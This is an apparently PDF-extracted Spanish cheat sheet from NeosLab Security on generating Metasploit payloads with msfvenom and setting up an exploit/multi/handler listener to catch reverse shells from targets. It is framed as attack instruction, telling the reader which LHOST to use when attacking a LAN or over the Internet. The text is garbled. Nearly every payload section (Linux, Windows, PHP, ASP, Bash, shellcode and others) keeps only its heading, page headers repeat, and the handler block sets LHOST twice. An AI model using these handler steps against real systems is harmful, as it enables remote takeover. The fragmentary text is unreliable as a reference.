Beruflich Dokumente
Kultur Dokumente
En METASPLOIT
www.neoslab.com
ab.com
CREAR PAYLOAD
En METASPLOIT
GENERAL
ÍNDICE
2 NEOSLAB SECURITY
Medellín ~ Colombia
contact@neoslab.com
www.neoslab.com
CREAR PAYLOAD
En METASPLOIT
A menudo, una de las habilidades más útiles y subestimadas por el principiante de Metasploit es el módulo
msfpayload. Se pueden crear múltiples payloads con este módulo y ayudar a que pueda darle un shell en casi
cualquier situación. Para cada uno de estos payloads, puede acceder a msfconsole y seleccionar exploit/multi/
handler. Ejecute 'establecer payloads' para los payloads relevantes utilizados y configurar todas las opciones
necesarias (LHOST, LPORT, etc.).
Para los ejemplos a continuación es bastante explicativo, pero LHOST debe completarse con su dirección IP
(LAN IP si ataca dentro de la red, WAN IP si ataca a través de Internet), y LPORT debe ser el puerto que desea
volver a conectar.
$ msfvenom -l
2. PAYLOADS BINARIE
2.1 Linux
2.2 Windows
2.3 Mac
3. PAYLOADS WEB
3.1 PHP
Como el archivo se ha codificado con base64, no olvide abrirlo con su editor de texto favorito y agregar "<?php"
en la parte superior y "?>" al final.
3 NEOSLAB SECURITY
Medellín ~ Colombia
contact@neoslab.com
www.neoslab.com
CREAR PAYLOAD
En METASPLOIT
3.2 ASP
3.3 JSP
3.4 WAR
4. SCRIPTING PAYLOADS
4.1 Python
4.2 Bash
4.3 Perl
5. SHELLCODE PAYLOADS
Para todos los shellcode, consulte 'msfvenom -help-formats' para obtener información sobre los parámetros váli-
dos. Msfvenom dará salida al código que se puede cortar y pegar en este idioma para sus exploits.
4 NEOSLAB SECURITY
Medellín ~ Colombia
contact@neoslab.com
www.neoslab.com
CREAR PAYLOAD
En METASPLOIT
5.2 Shellcode basado en Windows
6. CREAR CONTROLADORES
Los controladores de Metasploit pueden ser excelentes para configurar rápidamente Metasploit para que esté en
condiciones de recibir sus Shell entrantes. Los controladores deben estar en el siguiente formato.
$ msfconsole
$ msf > use exploit/multi/handler
$ msf exploit(multi/handler) > set LHOST 0.0.0.0
$ msf exploit(multi/handler) > set PAYLOAD <Payload name>
$ msf exploit(multi/handler) > set LHOST <LHOST value>
$ msf exploit(multi/handler) > set LPORT <LPORT value>
$ msf exploit(multi/handler) > set ExitOnSession false
$ msf exploit(multi/handler) > exploit -j -z
Metasploit te permite generar payloads y usarlos durante un ataque. Para usar esta función, simplemente genere
su Payload antes de ejecutar su ataque y una vez que haya terminado, use "payload/generic/custom" para
especificar el payload a usar.
$ msfconsole
$ msf > use payload/generic/custom
$ msf payload(custom) > show options
$ ...show and set options...
$ msf payload(custom) > set PAYLOADFILE /path/to/the/payload
$ msf payload(custom) > set PAYLOADSTR the_payload_string_to_use
5 NEOSLAB SECURITY
Medellín ~ Colombia
contact@neoslab.com
www.neoslab.com